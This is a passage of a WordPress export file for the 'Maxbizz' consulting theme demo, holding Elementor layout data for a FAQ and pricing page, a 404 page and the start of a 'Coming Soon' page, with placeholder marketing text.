		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"1fad6c2","elType":"section","settings":{"padding":{"unit":"px","top":"117","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"cfef8fb","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b29ca39","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3d04547","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"ba86566","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"4865c99","elType":"widget","settings":{"sub":"faqs","title":"Most Popular Questions","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"f714140","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"af5bfe2","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0e107ea","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"531351e","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"2e8ff7b","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"b0dc727"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"b4483e5"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"f24ea6d"},{"acc_title":"Do you do fixed price or time and materials contracts?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"ceccd71"}],"_padding":{"unit":"px","top":"0","right":"10","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":true},{"id":"a627a5f","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"8463953","elType":"widget","settings":{"ot_accs":[{"acc_title":"Do you offer volume or loyalty discounts?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"b0dc727"},{"acc_title":"What problems does business consulting typically solve?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"5b50501"},{"acc_title":"How is the scope of a consulting project determined?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"2928abe"},{"acc_title":"How long does a business consulting project last?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"f4ae810"}],"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"10","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"84019eb","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-faq.jpg","id":571},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"82","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"content_position":"middle"},"elements":[{"id":"6f925c9","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"70c78a1","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"a41d7e6","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"152805f","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"c53e4ac","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"dcefd1a","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-faq.jpg","id":574},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"100","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a866378","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3d64e18","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2d57f68","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"2e06ec7","elType":"column","settings":{"_column_size":33,"_inline_size":53.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"c669db8","elType":"widget","settings":{"sub":"flexible pricing plans","title":"Choose The Best Plan","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"7255b73","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","align":"center","text_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"48","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"51bfab0","elType":"widget","settings":{"title_left":"Billed Monthly","title_right":"Billed Yearly","title_color":"#FFFFFF","toggle_bg":"#FFFFFF33"},"elements":[],"widgetType":"iswitcher"}],"isInner":true},{"id":"06865b6","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"04bd296","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"monthly","layout":"full_width"},"elements":[{"id":"75f58b9","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5d1e07a","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 69","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"a910be5","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"14789ad","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 79","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"a5e277a","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"4f90658","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 89","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"e676d1e","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"yearly","layout":"full_width"},"elements":[{"id":"9729d97","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"194320d","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"88ccea0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"148d950","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"d27a889","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"4fc8771","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"5ef0e76","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"789c4a0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b5a1c52","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01-1.svg","id":583},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02-1.svg","id":584},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03-1.svg","id":585},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04-1.svg","id":586},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05-1.svg","id":587},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06-1.svg","id":588},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:6:"column";a:3:{s:5:"count";i:19;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:19;s:19:"_inline_size_tablet";i:12;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:5:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:14:"subtitle_style";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:2;s:10:"text_color";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:6;}s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:5;s:16:"content_position";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;s:11:"css_classes";i:2;}}s:5:"style";a:1:{s:18:"section_background";a:5:{s:21:"background_background";i:2;s:16:"background_image";i:2;s:19:"background_position";i:2;s:17:"background_repeat";i:2;s:15:"background_size";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:1:{s:5:"title";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:4:{s:5:"align";i:1;s:12:"align_mobile";i:1;s:4:"text";i:1;s:4:"link";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iswitcher";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"title_left";i:1;s:11:"title_right";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:2:{s:11:"title_color";i:1;s:9:"toggle_bg";i:1;}}}}s:13:"ipricingtable";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"title";i:6;s:5:"price";i:6;s:9:"price_for";i:6;s:7:"details";i:6;s:11:"is_featured";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:4;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:3:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>404</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/404-2/</link>
		<pubDate>Wed, 09 Sep 2020 03:33:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=597</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_White.svg" alt="Maxbizz Consulting">
				</a>			        
			<h1>404</h1>		
			<h2>Sorry! Page Not Found!</h2>		
		<p>Oops! The page you are looking for does not exist. Please return to the site’s homepage.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">TAKE ME HOME</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>597</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:33:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:33:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[404-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"dc90a5e","elType":"section","settings":{"height":"full","content_position":"middle","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg-404.jpg","id":599},"css_classes":"error-404","vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"ab481db","elType":"column","settings":{"_column_size":100,"_inline_size":null,"align":"center","_ot_content_align":""},"elements":[{"id":"ff9a571","elType":"widget","settings":{"align":"center","logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_White.svg","id":1416},"logo_width":{"unit":"px","size":140,"sizes":[]},"_position":"fixed","_offset_x":{"size":0,"unit":"px"},"_offset_y":{"size":70,"unit":"px"},"_offset_y_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"2a1d1ef","elType":"widget","settings":{"title":"404","header_size":"h1","align":"center","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":180,"sizes":[]},"typography_font_weight":"300","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":80,"sizes":[]},"typography_font_family":"Open Sans","typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"6bd4e37","elType":"widget","settings":{"title":"Sorry! Page Not Found!","align":"center","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":42,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":34,"sizes":[]},"typography_line_height_mobile":{"unit":"em","size":1.1999999999999999555910790149937383830547332763671875,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"02eb208","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"b70cb7b","elType":"column","settings":{"_column_size":33,"_inline_size":30,"_inline_size_tablet":20},"elements":[],"isInner":true},{"id":"2ca71f3","elType":"column","settings":{"_column_size":33,"_inline_size":38.88900000000000289901436190120875835418701171875,"_inline_size_tablet":60},"elements":[{"id":"c0b5c0b","elType":"widget","settings":{"editor":"<p>Oops! The page you are looking for does not exist. Please return to the site\u2019s homepage.<\/p>","align":"center","text_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":18,"sizes":[]},"column_gap":{"unit":"%","size":"","sizes":[]},"_element_custom_width":{"unit":"px","size":425,"sizes":[]},"typography_font_size_mobile":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1958c9e","elType":"column","settings":{"_column_size":33,"_inline_size":30.77499999999999857891452847979962825775146484375,"_inline_size_tablet":20},"elements":[],"isInner":true}],"isInner":true},{"id":"c047923","elType":"widget","settings":{"_css_classes":"page-content","_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-search"},{"id":"64444b7","elType":"widget","settings":{"align":"center","text":"TAKE ME HOME","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","background_color":"","border_color":""},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:5:"align";i:1;s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:17:"_section_position";a:4:{s:9:"_position";i:1;s:9:"_offset_x";i:1;s:9:"_offset_y";i:1;s:16:"_offset_y_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:3:{s:5:"title";i:2;s:11:"header_size";i:1;s:5:"align";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:8:{s:11:"title_color";i:2;s:21:"typography_typography";i:2;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_family";i:1;s:22:"typography_line_height";i:1;s:29:"typography_line_height_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:3;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:1;s:10:"column_gap";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:5:"align";i:1;s:10:"text_color";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:17:"_section_position";a:1:{s:21:"_element_custom_width";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:6:"layout";i:1;s:3:"gap";i:1;s:6:"height";i:1;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:11:"css_classes";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_image";i:1;}}}}s:16:"wp-widget-search";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:1;s:7:"_margin";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Coming Soon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/coming-soon/</link>
		<pubDate>Wed, 09 Sep 2020 03:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=604</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/theratio">
							<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="" loading="lazy" />								</a>
			<h2>Maxbizz is in the Works!</h2>		
